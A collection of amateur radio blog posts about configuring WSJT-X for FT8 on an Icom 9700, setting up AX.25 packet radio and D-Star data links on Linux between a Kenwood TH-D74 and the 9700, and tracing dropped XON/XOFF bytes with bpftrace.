    • Mode: Data/Pkt (USB also works, but will use DATA OFF MOD as audio, so that needs to be USB)
    • Serial port: /dev/ttyUSB0 (on my Linux machine at least)
  • Audio
    • Input: alsa_input.usb-Burr-Brown_from_TI_USB_Audio_CODEC-0.analog-stereo
    • Output: alsa_output.usb-Burr-Brown_from_TI_USB_Audio_CODEC-0.analog-stereo
  • Frequencies
    • Right click on the “Working frequencies” table and insert 144.174 and 432.065 for FT8. I’m not sure about the 70cm frequency, as I’ve not made contacts on it, and find conflicting information about the right frequency.

Glitches

I had the comms glitch for a bit, where wsjtx said frequency change commands were rejected. Unplugging/replugging and even restarting the radio didn’t help, but changing mode out of USB-D did. I don’t know if this was a one-off.

Performance

With a VX30 antenna on a first floor balcony I’m reaching surprisingly far:

Reach on 2m

Other tests have seen spots all over south of England and Wales.

I ran various tests with power levels between 5W and 40W. Sure, it’s nothing like on the HF bands on 10W from the same location, but that’s the nature of the bands:

Reach on 20m

Amateur packet radio walkthrough

An earlier version of this post that did data over D-Star was misleading. This is the new version.

This blog post aims to describe the steps to setting up packet radio on modern hardware with Linux. There’s lots of ham radio documentation out there about various setups, but they’re usually at least 20 years old, and you’ll find recommendations to use software that’s not been updated in just as long.

Specifically here I’ll set up a Kenwood TH-D74 and ICom 9700 to talk to each other over D-Star and AX.25. But for the latter you can use cheap Baofengs just as well.

Note that 9600bps AX.25 can only be generated by a compatible radio. 1200bps can be sent to a non-supporting radio as audio, but 9600bps cannot. So both D-Star and AX.25 here will give only 1200bps. But with hundreds of watts you can get really far with it, at least.

I’ll assume that you already know how to set up APRS (and therefore KISS) on a D74. If not, get comfortable with that first by reading the manual.

DMR doesn’t seem to have a data mode, and SystemFusion radios don’t give the user access to send arbitrary payload. That leaves FM-modulated AX.25 and D-Star at 1200bps.

It’s really frustrating that none of the three digital amateur radio systems (D-Star, DMR, and SystemFusion) allow actually sending arbitrary digital data. Or at least their radios don’t.

Again, for an experimental learning hobby, it’s surprisingly closed.

My setup

I’ll connect a laptop to a D74 over bluetooth, and a raspberry pi to the 9700 over USB. I’ll use callsign M0XXX on the laptop, and 2E0XXX on the raspberry pi.

If you copy-paste, please make sure to replace these with your own call sign.

You don’t need to have two call signs to do this. I just did this to make it clearer to me (and this post) what’s where, and my old Intermediate call sign is still valid, so I can.

Technology stack

As I described a bit in my APRS blog post this will involve a TNC. Luckily the D74 has one built in. The ICom 9700 has USB serial, and D-Star data, but not a TNC.

With the 9700 you can set the second virtual USB port to be for DV Data. That’ll give you direct access for two-way communication across the D-Star data channel. But it’s ASCII only. For more details see page 10-22 in the IC-9700 Advanced Manual.

So we’ll leave D-Star data for now. I’ll come back to it later on.

To get packet data working on the D74:

  1. Connect bluetooth serial device (or use a USB serial port)
  2. Get working KISS communication with the radio’s TNC over serial
  3. Connect the KISS port to the kernel to get AX.25
  4. Run services on top of AX.25

While setting this up, don’t forget to turn your TX power down to minimum. Likely it’ll still work for you too with a dummy load attached instead of an antenna, even on minimum power.

1. Connect bluetooth serial device

  1. Enable bluetooth on the D74 (menu-931)
  2. Route KISS and DV/DR to bluetooth (menu-983&984)
  3. Confirm your laptop has a bluetooth device
    laptop$ hcitool dev
    Devices:
        hci0   A0:51:0B:01:02:03
    
  4. Set the D74 in pairing mode (menu-934)
  5. Check that you can find the radio
    laptop$ sudo hciconfig hci0 piscan
    laptop$ sdptool add SP
    laptop$ hcitool scan
    [you should see the TH-D74 here]
    laptop$ export D74=00:11:22:33:44:55   # (the mac address you see)
    
  6. Test connect to the radio:
    laptop$ sudo rfcomm connect /dev/rfcomm0 $D74 2
    

    If it says it’s good, that’s a confirmation so we press ^C. If it doesn’t work, try inside and outside of pairing mode.

2. Get working KISS communication with the radio’s TNC over serial

  1. Set the system up to connect to the radio when anything opens /dev/rfcomm0:
    laptop$ sudo rfcomm bind /dev/rfcomm0 $D74 2
    
  2. Enable KISS12 (not KISS96) mode on the D74.
  3. To confirm that it works, start direwolf’s kissutil, as a test:
    laptop$ mkdir tx rx
    laptop$ kissutil -p /dev/rfcomm0 -f tx -o rx
    
  4. Send a test message (make sure you use your own call sign, not M0XXX)
    laptop$ echo 'M0XXX-4>APDR15,WIDE1-1:=3807.41N/212006.78WbMESSAGE' > tx/msg
    

    This should send the message via AX.25 on VFO A. You should see kissutil confirming this, and the radio should transmit. If you have another radio capable of APRS then it should have received the packet.
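For reference, the test line follows the common `SOURCE>DESTINATION,PATH:payload` monitor format. A small Python sketch of how it splits up (the function name is made up, and it does no validation):

```python
def parse_monitor_line(line: str) -> dict:
    """Split 'SRC>DEST,PATH1,PATH2:info' into its parts."""
    header, info = line.split(":", 1)
    source, rest = header.split(">", 1)
    destination, *path = rest.split(",")
    return {
        "source": source,            # who is sending
        "destination": destination,  # for APRS, usually a software identifier
        "path": path,                # requested digipeater path
        "info": info,                # the APRS payload itself
    }


pkt = parse_monitor_line("M0XXX-4>APDR15,WIDE1-1:=3807.41N/212006.78WbMESSAGE")
for key, value in pkt.items():
    print(f"{key:12} {value}")
```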

That should confirm that the serial device is working. Now turn off kissutil.

Actually the quicker way that doesn’t require direwolf is to just run:

laptop$ echo -ne '\xC0\x00hello world from M0XXX\xC0' > /dev/rfcomm0

That is a simple way to send a packet using the KISS protocol.
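The echo works because the text contains no bytes that are special to KISS. A minimal Python sketch of the general framing, with the escaping that KISS defines for payloads that do contain 0xC0 or 0xDB (the function name is my own):

```python
FEND = 0xC0   # frame delimiter
FESC = 0xDB   # escape byte
TFEND = 0xDC  # FESC TFEND stands for a literal 0xC0
TFESC = 0xDD  # FESC TFESC stands for a literal 0xDB


def kiss_frame(payload: bytes, port: int = 0, command: int = 0) -> bytes:
    """Wrap payload in a KISS frame. Command 0 means data frame."""
    out = bytearray([FEND, (port << 4) | command])
    for b in payload:
        if b == FEND:
            out += bytes([FESC, TFEND])
        elif b == FESC:
            out += bytes([FESC, TFESC])
        else:
            out.append(b)
    out.append(FEND)
    return bytes(out)


# Same bytes as the echo command above.
print(kiss_frame(b"hello world from M0XXX"))
```

Writing the result to /dev/rfcomm0 opened in binary mode should be equivalent to the echo, though I’ve only sketched the framing here, not the serial handling.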

Now you also know how to send arbitrary packets. And you can use Xastir with APRS from here and be done, if that’s all you wanted to do. Just point Xastir to /dev/rfcomm0 as a serial TNC device.

Xastir is an ancient program that uses 90s era UI components. If you’re not used to Motif-looking UIs you may think that it’s broken. But no it actually does work.

3. Connect the KISS port to the kernel to get AX.25

First you need to set up the AX.25 port.

laptop$ echo "radio M0XXX-1 1200 255 2 My D74 radio" | sudo tee -a /etc/ax25/axports

You’ll be able to override the window and packet sizes on a per-socket basis, so those two values are not that important for socket programming.
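The fields on an axports line are, in order: port name, callsign, serial speed, packet length, window, and a free-text description. A short Python sketch that splits the line used above (the class and function names are made up for illustration):

```python
from typing import NamedTuple


class AxPort(NamedTuple):
    name: str
    callsign: str
    speed: int
    paclen: int
    window: int
    description: str


def parse_axports_line(line: str) -> AxPort:
    """Parse one non-comment line of /etc/ax25/axports."""
    name, callsign, speed, paclen, window, description = line.split(None, 5)
    return AxPort(name, callsign, int(speed), int(paclen), int(window),
                  description.strip())


port = parse_axports_line("radio M0XXX-1 1200 255 2 My D74 radio")
print(port)
```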

Then you can attach the port, thus turning your serial KISS port into an AX.25 packet interface:

laptop$ sudo kissattach /dev/rfcomm0 radio
AX.25 port radio bound to device ax0
laptop$ ifconfig ax0
ax0: flags=67<UP,BROADCAST,RUNNING>  mtu 255
        ax25 M0XXX-1  txqueuelen 10  (AMPR AX.25)
        RX packets 65  bytes 1361 (1.3 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 84  bytes 7884 (7.6 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

(you’ll have 0 packets in your counters, of course)

The D74 connected to the laptop is now set up and ready for AX.25 traffic.

You can set an IP address on the ax0 interface and try to use it directly. I don’t think that’s the best use of the connection, since while yes it did work, TCP/IP applications are very chatty, and don’t work well on a half duplex 1200bps wire.

You’ll have to tweak your TCP stack. Default Linux settings sent a second SYN packet just a fraction of a second after the first, under the assumption that it’d be lost. Woah there, cowboy. Patience.

Also you have to make sure on a modern system to stop all the chatty things trying to autodiscover what’s on this new interface you just connected. Not that amusing to have your radio be busy for a few seconds while SSDP tries to find what chromecasts you have attached.

For D-Star data you don’t need more software. But more on that later.

So now we set up direwolf, a software TNC.

To operate the push-to-talk we’ll first start rigctld:

raspberry$ rigctld  -m 3081 -r /dev/ttyUSB0 -s 19200

This needs to be from a fairly recent version of hamlib, since the 9700 hasn’t been supported for long. It’s a fairly new radio, after all. I also needed to download and compile direwolf, since for some reason the raspbian one didn’t have hamlib support.

My direwolf.conf looks like this, but check aplay -l for which sound card is the right one. Since it’s a virtual sound card built into the 9700, it’ll probably be plughw:1,0. I have another USB sound card connected, so that’s why it’s 2,0.

ADEVICE plughw:2,0
PTT RIG 2 localhost:4532
CHANNEL 0
MYCALL 2E0XXX-4

Then start direwolf:

raspberry$ direwolf -p -t 0 -c direwolf.conf
[…]
Virtual KISS TNC is available on /dev/pts/8

The -p switch activates the KISS port, which we’ll need. Now attach it as an AX.25 port:

raspberry$ echo radio 2E0XXX-1 9600 255 2 My icom radio | sudo tee -a /etc/ax25/axports
raspberry$ sudo kissattach /dev/pts/8 radio

Now the raspberry should also have a working ax0 interface.

Try assigning an IP address and see if the radios light up. Remember: patience.

4. Run services on top of AX.25

While debugging it can be very useful to run axlisten -a on both machines. It’s tcpdump for AX.25. tcpdump does work on the ax0 interface, but it can only capture, not decode. So it’s of limited use. Wireshark can read any captured pcap files though.

The config /etc/ax25/axports seems to mainly define the radio and the “main call sign”. Even though I defined 2E0XXX-1 on the raspberry pi in that file, the other SSIDs are still usable if you make sure to add 2E0XXX-1 as the path.

The multiplexer of services (think “TCP ports”) of this system is the SSIDs when setting up ax25d.

ax25d is an inetd-like multiplexer, allowing you to write simple programs that read from stdin and write to stdout, and thereby create interactive applications. Then you can have 2E0XXX-2 show a funny message, 2E0XXX-3 have a shell, 2E0XXX-4 be a chat system, etc…

Non-interactive program

Let’s say this is our program, stored in /home/pi/hello, and executable:

#!/usr/bin/env bash
echo Hello world
# sleep so that the output doesn't disappear before we've seen it,
# when axcall exits.
exec sleep 10

Then we can set up 2E0XXX-3 to be that program:

raspberry$ sudo emacs /etc/ax25/ax25d.conf
[2E0XXX-3 VIA radio]
default  * * * * * *  * pi /home/pi/hello hello

Then start ax25d -l as root.

You should now be able to “dial” into that “port”:

laptop$ axcall radio 2E0XXX-3
[full screen window should open, showing that hello world]

Interactive program

Sure, that’s cool. We can display a message, or even stream some data. But let’s get some interactive stuff going!

Unfortunately axcall uses CR-terminated newlines instead of NL, so most programs won’t “just work”.

So I hacked together a wrapper that sits between ax25d and the program, and replaces CR with NL.
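The idea is small enough to sketch in Python. This is not the wrapper itself, just an illustration of the translation. It runs the child once with all input up front, whereas a real wrapper has to stream in both directions, and translating the child’s output back to CR is my assumption about what the other end expects.

```python
import subprocess
import sys


def from_radio(data: bytes) -> bytes:
    """Input arriving from axcall: CR line endings become NL."""
    return data.replace(b"\r", b"\n")


def to_radio(data: bytes) -> bytes:
    """Output going back to axcall: NL becomes CR (assumed)."""
    return data.replace(b"\n", b"\r")


def run_translated(argv, radio_input: bytes) -> bytes:
    """Run a line-based program with translated input and output."""
    result = subprocess.run(argv, input=from_radio(radio_input),
                            stdout=subprocess.PIPE, check=True)
    return to_radio(result.stdout)


# Stand-in for the "server": greets whoever types their name.
child = [sys.executable, "-c", "print('Hello ' + input())"]
print(run_translated(child, b"Thomas\r"))
```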

This allows this simple interactive “server”:

#!/usr/bin/env bash
echo Hello world
read NAME
echo "Hello ${NAME}"
# sleep so that the output doesn't disappear before we've seen it,
# when axcall exits.
exec sleep 10

raspberry$ sudo tee -a /etc/ax25/ax25d.conf
[2E0XXX-5 VIA radio]
default  * * * * * *  * pi /home/pi/nlwrap -e /dev/stdout name /home/pi/name
^D
raspberry$ sudo pkill -HUP ax25d

The -e /dev/stdout redirects the subprogram’s stderr to also be shown in the stream. Annoyingly it will otherwise simply be shown on the terminal where you happened to start ax25d, even though ax25d runs in the background.

You should see the ports if you run netstat --protocol=ax25.

Now dial into this new port:

laptop$ axcall radio 2E0XXX-5
[you should now be talking to the interactive "BBS" you've made]

D-Star

D-Star will provide a streaming interface more than a packet one. And it’ll only allow “ASCII”. Specifically 0x11 and 0x13 will be filtered out, as they are part of XON/XOFF on the virtual serial port.

For the story of me finding this out, see this post.

Sure, you can build packet data on top of just printable characters, but if you base64 encode then you’ll lose even more of the 1200bps.
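To put a number on that loss, a quick Python sketch. Base64 turns every 3 bytes into 4 printable characters, so it never emits 0x11 or 0x13, but only about three quarters of the link carries payload. The 1200 figure is the nominal rate from above, and framing overhead is ignored.

```python
import base64

XON, XOFF = 0x11, 0x13
LINK_BPS = 1200  # nominal D-Star DV data rate used in this post

raw = bytes(range(256))  # every possible byte value, including XON and XOFF
encoded = base64.b64encode(raw)

# Nothing in the encoded stream can be mistaken for flow control.
assert XON not in encoded and XOFF not in encoded

efficiency = len(raw) / len(encoded)
print(f"{len(raw)} bytes become {len(encoded)} bytes on the wire")
print(f"roughly {LINK_BPS * efficiency:.0f} of {LINK_BPS} bps left for payload")
```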

But here’s how to set up the data channel. First pkill kissattach on both computers, to give you back the serial ports and prevent irrelevant traffic.

Configure the D74

  1. Turn off KISS mode on the D74 (F,5, until it doesn’t say APRS or KISS)
  2. Select VFO B (A/B button)
  3. Switch mode to DV/DR (click Mode until you get DV or DR)
  4. Turn DV/DR mode to DV (F,Mode, DV/DR)
  5. Tune VFO B to a frequency you want to use
  6. Switch to data mode (F-Mode, Voice/Data). Note that it’ll switch back to Voice if you switch out of D-Star mode and in again.

Configure the ICom 9700

  • Menu->Set->Connectors->USB (B)/Data function
    • USB (B) Function: DV Data (default: OFF)
    • DV Data/GPS Out Baud Rate: 9600 (default)
  • Menu->Set->DV/DD Set
    • DD TX Inhibit (Power ON): OFF
  • Set the radio to DV mode

And restart the radio. You can also press the CALL button to turn off DD TX Inhibit without restarting.

Send/receive data

raspberry$ minicom -s
# set device /dev/ttyUSB1 (/dev/ttyUSB0 is the main control port for
# the 9700, /dev/ttyUSB1 is the DV Data stream as we've configured it).
# Set baud rate 9600, 8N1. XON/XOFF
laptop$ minicom -s
# set device /dev/rfcomm0.
# Set baud rate 1200, 8N1. XON/XOFF

You can also send and receive data from the command line:

raspberry$ cat /dev/ttyUSB1
laptop$ echo hello world > /dev/rfcomm0

I was surprised to see that the baud rate actually does matter, even though neither the D74 nor the 9700 use actual serial devices, but Bluetooth and USB, respectively. I think this may be the first time where serial over USB with the wrong baud rate has not “just worked” for me. Though I usually set it to what it’s supposed to be, so I may be off here.

Now start typing. As you type the radios should transmit.

I don’t know if this way of chatting has better range than AX.25. Because it’s the year 2020 it’s not the best time to do range tests.

More things you can do

IP over AX.25

Assign an IP address to the ax0 interfaces and start using IP over radio. With the hundreds of watts ham radio allows this beats the hell out of wifi. Except in speed, of course.

D-Star has a 128kbps mode too (still not wifi speed), but only on the 23cm band (1.2GHz). I only have one radio with 23cm (the Icom 9700), so have not been able to play with it. Maybe if I set up D-Star packet decoding with an SDR I’ll be able to do some fun there. Then it may be worth doing base64 or something on top of D-Star DV Data.

Keep in mind though that this is probably not as useful as you think. In most jurisdictions it’s illegal to obscure amateur radio signals, which means no encryption.

Authenticated BBS / IP

While encryption is not allowed (you’re not allowed to “obscure the meaning”), I don’t see a reason you can’t create an authenticated shell that sends commands signed by a private key. The meaning is not obscured.

I’ve created a library and some test programs for writing C++ that does just that. See the examples directory in axlib, or run axsh (shell) or axftp (file transfer) directly.

I built a protocol that should be replay-safe, and it uses ed25519 signatures.

Maybe it’s possible to patch the null cipher back into OpenSSH. I don’t know enough about the protocol to know if there are still “obscured meanings” left even then. But I’m also sceptical that this is the right path. With the roundtrip latencies (mentioned above) I don’t think I’d want a chatty protocol, but something where the protocol is designed to minimize roundtrips and be as quiet as possible.

In the olden days, before computer security was invented, people set up login terminals over ham radio. You can map callsigns to usernames for their login. This can be a cool proof of concept thing, but maybe best run inside a VM that gets periodically wiped, since anyone with a radio can do whatever they want to your connections.

Non-connected message passing and routing.

You can send messages via other stations. I’ve not yet tried sending any data via my local D-Star repeater, but I’m hoping that it can be routed back to me via my OpenSpot.

Look into NET/ROM, and ROSE

I have nothing to say about these yet, having not experimented with them.

Look into JNOS (not a typo)

“JNOS is first and foremost a router for ax.25, netrom, and ip protocols - ip over rf is possible by encapsulating the ip in ax.25 frames. It is a packet node, bbs, personal mailbox system, convers server (chatroom), offers a variety of tcp services, supports ax.25 tunnels (axip and axudp) over wired networks, supports ip encapsulation (ipip and ipdup) over wired networks” — What is JNOS?

In addition to links inline with the text.

Troubleshooting KISS with bpftrace

This is the troubleshooting story about me finding out why some packets were getting dropped when running AX.25 over D-Star DV between a Kenwood TH-D74 and an Icom 9700.

Troubleshooting: “Trouble”, from the latin “turbidus” meaning “a disturbance”. “Shooting”, from American English meaning “to solve a problem”.

The end result is this post, and this is the troubleshooting story.

The setup: laptop->bluetooth->D74->rf->9700->usb->raspberry pi.

I’m downloading from the raspberry pi, with the laptop sending back ACKs. But one of the ACKs is not getting through.

axlisten -a clearly showed that the dropped packet was being sent from the laptop:

radio: fm M0XXX to 2E0XXX-9 ctl RR6-

But nothing received on the receiver side. I saw the D74 light up red to TX, and the 9700 light up green on RX, but then nothing. Error counters in ifconfig ax0 were counting up on the receiver side. So something is being sent over the air.

And it wasn’t the first packet. All the ones before it were fine. They were always fine. This packet was always dropped. It was always only that packet that caused it to stall. The window size was set to 2, so session establishment, RR0, RR2, and RR4 went through just fine. But RR6 keeps getting re-sent, and never gets there.

I tried slowing down the sender on the raspberry pi. Now it no longer stalled! Note that I didn’t say that RR6 arrived. It actually didn’t. But because the window size was 2 the raspberry pi would send another data packet, acked by RR7, which would arrive just fine and ACK everything up to there.

Is the packet being sent to the radio correctly? Is the radio actually sending it over the air correctly? Is it received? Is it being sent via serial to the receiving computer?

This sounds like something kernel tracing would help with. I could start sniffing the radio traffic using an SDR, but I wasn’t looking forward to banging my head against demodulating D-Star. Seems like I’ll do that if I have to, but will try pure software first.

And remember this is the kernel (AX.25 layer) sending data to the KISS driver, which in turn sends it on to the serial port (which in turn is USB or Bluetooth, in my case). So it’s not in user space at any point. I can’t just strace.

I search around the kernel source for rfcomm (bluetooth) and ax25, and find some functions that may tell me when something is sent, and what it is.

kprobe:ax25_kiss_rcv {
  printf("rx %p\n", arg1);
}
kprobe:ax25_queue_xmit {
  printf("tx\n");
}

This seems to confirm that I have some good endpoints. I see that the packet is being sent, and not received. Let’s go one level lower on the receiver side.

kprobe:ax25_kiss_rcv {
  printf("ax25 recv %s\n", kstack);
}
kprobe:mkiss_receive_buf {
  printf("mkiss_receive_buf\n");
}

Here I see that the KISS driver is receiving something, but it doesn’t get to the AX.25 layer.

What could the KISS layer on the laptop actually be sending to the radio?

Dumping what’s actually sent to the D74

I couldn’t immediately find any good way to dump payload (but see below), so I just printed the bytes as a string, for decoding in Python. Though this may not work if the packet has nulls in it, I’ve not tested it (again, see below).

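kprobe:rfcomm_tty_write {
  printf("%d\n%s", arg2, str(arg1, arg2));
}

#!/usr/bin/python3
# Decode the trace: each record is a length line followed by that many
# payload bytes. latin-1 maps every byte to exactly one character, so
# non-ASCII payload bytes survive being read in text mode.
f = open('complete-trace', encoding='latin-1', newline='')
while True:
    l = f.readline()
    if l == '\n':
        continue
    if l == '':
        # Empty string means end of file. Sanity check that it really is.
        if f.read(1) != '':
            raise ValueError("Wat")
        break
    l = l.strip()
    n = int(l)
    data = f.read(n)
    print(' '.join(["%02x" % ord(x) for x in data]))
    # Keep the most recent packet around for closer inspection.
    open('t.dat', 'w', encoding='latin-1', newline='').write(data)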

Output:

c0 80 9a 60 a8 90 86 40 e4 9a 60 a8 90 86 40 61 3f 78 a5 c0
c0 80 9a 60 a8 90 86 40 64 9a 60 a8 90 86 40 e1 51 f9 4f c0
c0 80 9a 60 a8 90 86 40 64 9a 60 a8 90 86 40 e1 91 f9 1f c0
c0 80 9a 60 a8 90 86 40 64 9a 60 a8 90 86 40 e1 d1 f8 ef c0
c0 80 9a 60 a8 90 86 40 64 9a 60 a8 90 86 40 e1 11 f8 bf c0
c0 80 9a 60 a8 90 86 40 64 9a 60 a8 90 86 40 e1 11 f8 bf c0
c0 80 9a 60 a8 90 86 40 64 9a 60 a8 90 86 40 e1 11 f8 bf c0
c0 80 9a 60 a8 90 86 40 64 9a 60 a8 90 86 40 e1 11 f8 bf c0
c0 80 9a 60 a8 90 86 40 64 9a 60 a8 90 86 40 e1 11 f8 bf c0

Note the 5 repeats of the last packet. That’s the RR6 packet that’s not getting there, repeated. Yeah, so far it looks like it’s getting to the sending radio. But what are those two bytes in the end? I don’t see those in my tcpdumps. A checksum? And what’s with that 0x80? That should be 0x00 indicating a data frame, right?
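For reading these dumps by hand: after the leading 0xC0 and the command byte come the AX.25 destination and source addresses, 7 bytes each. Each callsign character is shifted left by one bit, and the SSID sits in bits 1 to 4 of the seventh byte. A minimal Python sketch that decodes the first line of the dump (function name is my own, and it assumes no KISS escape sequences in the frame):

```python
def decode_address(field: bytes):
    """Decode one 7-byte AX.25 address field into (callsign, ssid)."""
    callsign = bytes(b >> 1 for b in field[:6]).decode("ascii").rstrip()
    ssid = (field[6] >> 1) & 0x0F
    return callsign, ssid


frame = bytes.fromhex(
    "c0 80 9a 60 a8 90 86 40 e4 9a 60 a8 90 86 40 61 3f 78 a5 c0")
body = frame[2:-1]  # drop FEND + command byte at the start, FEND at the end
dest = decode_address(body[0:7])
src = decode_address(body[7:14])
print("to", dest, "from", src)
```

What remains after the two addresses is the control byte and then the two trailing bytes the questions above are about.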

Looking in the kernel source I see that there’s a checksum added to the KISS stream sometimes (also mentioned in dmesg). That’s odd, I didn’t see that on the wikipedia page.

Reading the kernel code it looks like there are two checksum standards (why just one? that’d be too easy). If you send data to TNC port 8 (via command 0x80), then it’s one checksum system. If you send via port 2 using command 0x20 it’s another. Super. This is a different kind of “port” from TCP port and axports, by the way.
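The byte right after the opening 0xC0 packs both pieces of information: the high nibble is the TNC port and the low nibble is the command, with command 0 meaning “data frame”. A tiny Python sketch (the function name is made up):

```python
def split_kiss_command(byte: int):
    """Return (tnc_port, command) from the first byte of a KISS frame."""
    return byte >> 4, byte & 0x0F


for value in (0x00, 0x20, 0x80):
    port, command = split_kiss_command(value)
    print(f"0x{value:02x}: port {port}, command {command}")
```

So 0x80 is still a data frame, just addressed to port 8.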

Since the checksum is for KISS, meaning for use between the computer and the TNC, it seems useless for me. Bluetooth/USB serial won’t corrupt data, right? I try kissparms -p radio -c 1 to turn off checksums, and it works! So the checksum is calculated wrong? Seems unlikely, since it works for every other packet. Also I seem to still have more intermittent corruption that’s unexpected.

But yeah, maybe the checksum calculation is just wrong? Nah, it wouldn’t affect just this packet, and with both CRC algorithms.

Back to printing the payload.

There’s a better way in the next version of bpftrace (it’s not in v0.10.0, which is the latest release as of time of writing): The buf() function and %r format specifier. So I download and compile git HEAD.

Here’s a bluetooth serial sniffer bpf program using this new better way:

#include <linux/skbuff.h>
#include <linux/tty.h>
kprobe:rfcomm_tty_write
{
  $tty = (struct tty_struct*)arg0;
  // Optionally print $tty->index
  printf("TX %d %r\n", arg2, buf(arg1, arg2));
}
// Other interesting functions:
// * kprobe:rfcomm_recv_data
// * kprobe:rfcomm_tty_copy_pending
kprobe:rfcomm_dev_data_ready
{
  $skb = (struct sk_buff*)arg1;
  $buf = buf($skb->data, (int64)($skb->len));
  printf("RX %d %r\n", $skb->len, $buf);
}

This is example output on the laptop side, where we see the received probes from the remote end, and the ACKs that get dropped transmitted (it’s not quite the same payload, because I experimented with different SSIDs):

[…]
RX 20 \xc0\x80\x9a`\xa8\x90\x86@\xe0d\x8a`\xac\x9a\x84s\x11\x05\xff\xc0
TX 20 \xc0\x80d\x8a`\xac\x9a\x84r\x9a`\xa8\x90\x86@\xe1\x11\xea\xd5\xc0
RX 20 \xc0\x80\x9a`\xa8\x90\x86@\xe0d\x8a`\xac\x9a\x84s\x11\x05\xff\xc0
TX 20 \xc0\x80d\x8a`\xac\x9a\x84r\x9a`\xa8\x90\x86@\xe1\x11\xea\xd5\xc0
RX 20 \xc0\x80\x9a`\xa8\x90\x86@\xe0d\x8a`\xac\x9a\x84s\x11\x05\xff\xc0
TX 20 \xc0\x80d\x8a`\xac\x9a\x84r\x9a`\xa8\x90\x86@\xe1\x11\xea\xd5\xc0

This shows the same thing. All the way to the Bluetooth layer it’s correct. So I’d say it’s either getting dropped over-the-air, by the receiving radio, or by the receiving linux kernel.

But because the checksum is wrong the packets don’t make it to the AX.25 layer, so they can’t be seen with tcpdump or axlisten there.

So I make another bpftrace program to sniff reception on the serial level.

#include <linux/tty_ldisc.h>
#include <linux/tty.h>
#include <linux/skbuff.h>

/*
// Sniff the serial data on the KISS layer.
kprobe:mkiss_receive_buf
{
  $tty = (struct tty_struct*)arg0;
  $data = arg1;
  $buf = buf($data, (uint64)(arg3));
  printf("RX KISS (pre CRC) %d %d %r\n", arg3, $tty->index, $buf);
}
*/

// Sniff on the tty layer.
kprobe:tty_ldisc_receive_buf
{
  $tty = (struct tty_ldisc*)arg0;
  $p = arg1; // data
  $count = arg3;
  $buf = buf($p, (uint64)(arg3));
  $name = str($tty->ops->name);
  $num = $tty->tty->index;
  if ($name == "mkiss") {
    printf("RX (pre CRC) %s(%d) %d %r\n", $name, $num, arg3, $buf);
  }
}

Annotated results:

# laptop: Probe received
RX (pre CRC) mkiss 20 \xc0\x80\x9a`\xa8\x90\x86@\xe0\x9a`\xa8\x90\x86@s\x11\xc6\xd9\xc0

# laptop: Probe got through CRC check
RX 20 \xc0\x80\x9a`\xa8\x90\x86@\xe0\x9a`\xa8\x90\x86@s\x11\xc6\xd9\xc0

# laptop: Resending ACK
TX 20 \xc0\x80\x9a`\xa8\x90\x86@r\x9a`\xa8\x90\x86@\xe1\x11\x1e\xdf\xc0

# raspberry pi: ACK bytes received
RX (pre CRC) mkiss 3 \xc0\x80\x9a
RX (pre CRC) mkiss 3 `\xa8\x90
RX (pre CRC) mkiss 3 \x86@r
RX (pre CRC) mkiss 3 \x9a`\xa8
RX (pre CRC) mkiss 3 \x90\x86@
RX (pre CRC) mkiss 3 \xe1\x1e\xdf
RX (pre CRC) mkiss 1 \xc0

# Nothing else. ACK didn't get through CRC check.

See the problem? 20 bytes sent. 19 arrive. 0x11 is gone. Of course the checksum fails. But how can it just disappear? And it’s like this every time for this packet.

After some more testing it seems that yes, all 0x11 bytes are lost. I can’t send packets with 0x11 in them!

What’s so special about 0x11? It’s flow control bytes for XON/XOFF.

The radio is stripping 0x11 and 0x13 (also confirmed) out because they are flow control characters.

Some more testing also showed that the radio sends these characters for flow control, so intended ones get dropped, and then extra ones are added.
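The dropped byte is easy to reproduce on paper. This Python sketch models only the stripping half of what I observed (not the extra flow control bytes the radio adds), using the transmitted ACK and the chunks that arrived on the raspberry pi from the annotated trace above:

```python
XON, XOFF = 0x11, 0x13


def through_radio(data: bytes) -> bytes:
    """Model of the observed behaviour: flow control bytes vanish in transit."""
    return bytes(b for b in data if b not in (XON, XOFF))


sent = b"\xc0\x80\x9a`\xa8\x90\x86@r\x9a`\xa8\x90\x86@\xe1\x11\x1e\xdf\xc0"
received = b"".join([
    b"\xc0\x80\x9a", b"`\xa8\x90", b"\x86@r", b"\x9a`\xa8",
    b"\x90\x86@", b"\xe1\x1e\xdf", b"\xc0",
])

print(len(sent), "bytes sent,", len(received), "bytes received")
print("explained by stripping XON/XOFF:", through_radio(sent) == received)
```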

I searched for a way to escape these bytes, but it’s apparently protocol-dependent, and not as simple as “the XON/XOFF way”. In fact wikipedia says “This is frequently done with some kind of escape sequence”. “Some kind of”… thanks.

While looking through the 9700 advanced manual on page 10-22 I come across a note that only ASCII is supported. Oh. Oh they mean this is only for printable characters, don’t they?

This is when I open minicom directly against the ports, start typing, and realize that I’m not working with a KISS TNC-like interface at all, no. Every character I type is immediately and correctly sent and received. The KISS communication I was almost successfully using to send AX.25 packets was actually between the two linux kernels, not between computers and radios.

I was talking KISS to myself, not to the radios!

All the 0xC0 escapes, 0x80 command, and everything else, was just a stream of bytes to the radios, to be sent as-is. Even though they’re not printable ASCII characters, the radio only bothers to drop the XON/XOFF characters.

Oh.

Well, I learned bpftrace. So there’s that.

Also I learned that I should read the manual more carefully. In my defense it’s three manuals, totalling 296 pages.

Transferring pictures with DStar

I’ve successfully experimented with sending pictures using the data portion of D-Star.

I did it in multiple ways, starting with the simplest and ending with the longest path (though not most complex).

Equipment is an Android phone, a Kenwood TH-D74, and an ICom IC-9700.

Simplex

First I did it the simplest way, using simplex between the radios.

You install the ICom RS-MS1A app (sigh, yes that’s the kind of useful naming scheme they have). You’d think this app is needed for the ICom radio, but no. The IC-9700 has Picture mode built in. I used this app for the Kenwood D74.

You start the app, select “Others (Bluetooth)”, and select the D74.

On the D74 you need to:

  1. Press 1 to go into VFO mode
  2. Select the right frequency
  3. Set the mode to digital (DV/DR)
  4. If it’s DR, switch it to DV in the digital menu.
  5. In the digital menu, switch it to DATA

Annoyingly, unlike the native picture mode in the IC9700, setting DATA mode on the D74 will not allow any voice transmission at all.

On the IC9700, just set the right frequency, switch to DV mode, and select Picture from the menu.

I won’t go into detail on how to actually trigger the TX, but it’s pretty simple. It’s better explained by video, and there are some already.

Via my own reflector

This was the most complex setup.

Before annoying people on real repeaters and reflectors with my tests I wanted to test it out on my own. I spun up a VM on GCP and set up a test reflector using these instructions. It was pretty straightforward except that I had to change /etc/init.d/xlxd to bind to 0.0.0.0 instead of the address it picked.

